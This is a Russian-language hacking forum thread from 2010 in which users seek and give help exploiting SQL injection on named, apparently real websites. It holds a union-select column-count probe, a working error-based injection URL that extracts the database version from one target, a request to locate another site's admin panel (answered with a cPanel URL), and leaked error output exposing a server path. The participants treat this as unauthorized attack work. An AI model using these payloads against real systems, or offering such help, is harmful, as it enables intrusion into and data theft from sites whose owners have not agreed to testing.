01.11.2010, 18:29
|
|
Участник форума
Регистрация: 17.04.2010
Сообщений: 221
С нами:
8456912
Репутация:
17
|
|
Сообщение от Tw!m4
есть уязвимый сайт:
Код:
www.site.com/index.php?login=&passwd='
кол-во столбцов подобрал, но почему то не выводит в какой колонке идет вывод на страницу.
подскажите чё нють плиз. Крути как блинд. Мы не экстрасенсы, линк давай!
|
|
|
01.11.2010, 19:52
|
|
Познающий
Регистрация: 04.11.2007
Сообщений: 51
С нами:
9746190
Репутация:
6
|
|
ПОдскажите плиз есть что-нибудь работающее в паблике для парсинга сайтов из гугла по определенному запросу?
|
|
|
|
01.11.2010, 23:54
|
|
Познающий
Регистрация: 15.06.2007
Сообщений: 91
С нами:
9951302
Репутация:
38
|
|
2 -PRIVAT-
Код:
http://rwo[dot]solutions[dot]co[dot]at/login.php?luser=%27union%20select%20null,null,null,null,null,null,null,null,null,null,null,null,null,null--%20&passwd=testik%27
вот собственно сайтец
как и говорил, с неверным кол-вом столбцов выдаёт ошибку, при правельном подборе страница показывает как ни в чём не бывало..... |
|
|
|
02.11.2010, 00:53
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
Сообщение от Tw!m4
2 -PRIVAT-
Код:
http://rwo[dot]solutions[dot]co[dot]at/login.php?luser=%27union%20select%20null,null,null,null,null,null,null,null,null,null,null,null,null,null--%20&passwd=testik%27
вот собственно сайтец
как и говорил, с неверным кол-вом столбцов выдаёт ошибку, при правельном подборе страница показывает как ни в чём не бывало..... http://rwo.solutions.co.at/ab/ab.php?id=954+or+(1,1)=(select+count(0),concat((se lect+version()+from+information_schema.tables+limi t+0,1),floor(rand(0)*2))from(information_schema.ta bles)+group+by+2)--+%20&opt=edit
|
|
|
|
02.11.2010, 01:12
|
|
Познающий
Регистрация: 15.06.2007
Сообщений: 91
С нами:
9951302
Репутация:
38
|
|
Сообщение от Konqi
http://rwo.solutions.co.at/ab/ab.php?id=954+or+(1,1)=(select+count(0),concat((se lect+version()+from+information_schema.tables+limi t+0,1),floor(rand(0)*2))from(information_schema.ta bles)+group+by+2)--+%20&opt=edit
А чё тут должно выйти? Чё т я как то не совсем врубаюсь...у меня выдает 404 еррор
object not found
PS: все пробелы убрал...
|
|
|
|
02.11.2010, 01:17
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
Сообщение от Tw!m4
А чё тут должно выйти? Чё т я как то не совсем врубаюсь...у меня выдает 404 еррор
object not found
PS: все пробелы убрал...
работало 2 минут назад, через дупликат
по всей видимости скрипт убрали...
UPD: работает
Duplicate entry '5.0.45-community-nt1' for key 1
|
|
|
|
02.11.2010, 12:39
|
|
Участник форума
Регистрация: 15.05.2009
Сообщений: 111
С нами:
8943448
Репутация:
127
|
|
http://www.salsacrazy.com помогите админку найти
|
|
|
|
02.11.2010, 13:00
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами:
10992741
Репутация:
0
|
|
Сообщение от Bramin
http://www.salsacrazy.com помогите админку найти
http://www.salsacrazy.com/cpanel
|
|
|
|
02.11.2010, 13:52
|
|
Новичок
Регистрация: 21.09.2010
Сообщений: 9
С нами:
8232086
Репутация:
6
|
|
Сообщение от None
http://www.cps.am/en/strategy-and-politics/9%27/
pomoqite pojalusta dalse raskrutit sql inj..
|
|
|
|
02.11.2010, 14:10
|
|
Новичок
Регистрация: 21.09.2010
Сообщений: 9
С нами:
8232086
Репутация:
6
|
|
Сообщение от None
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /usr/home/cpsam/public_html/index.php on line 13
?????
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
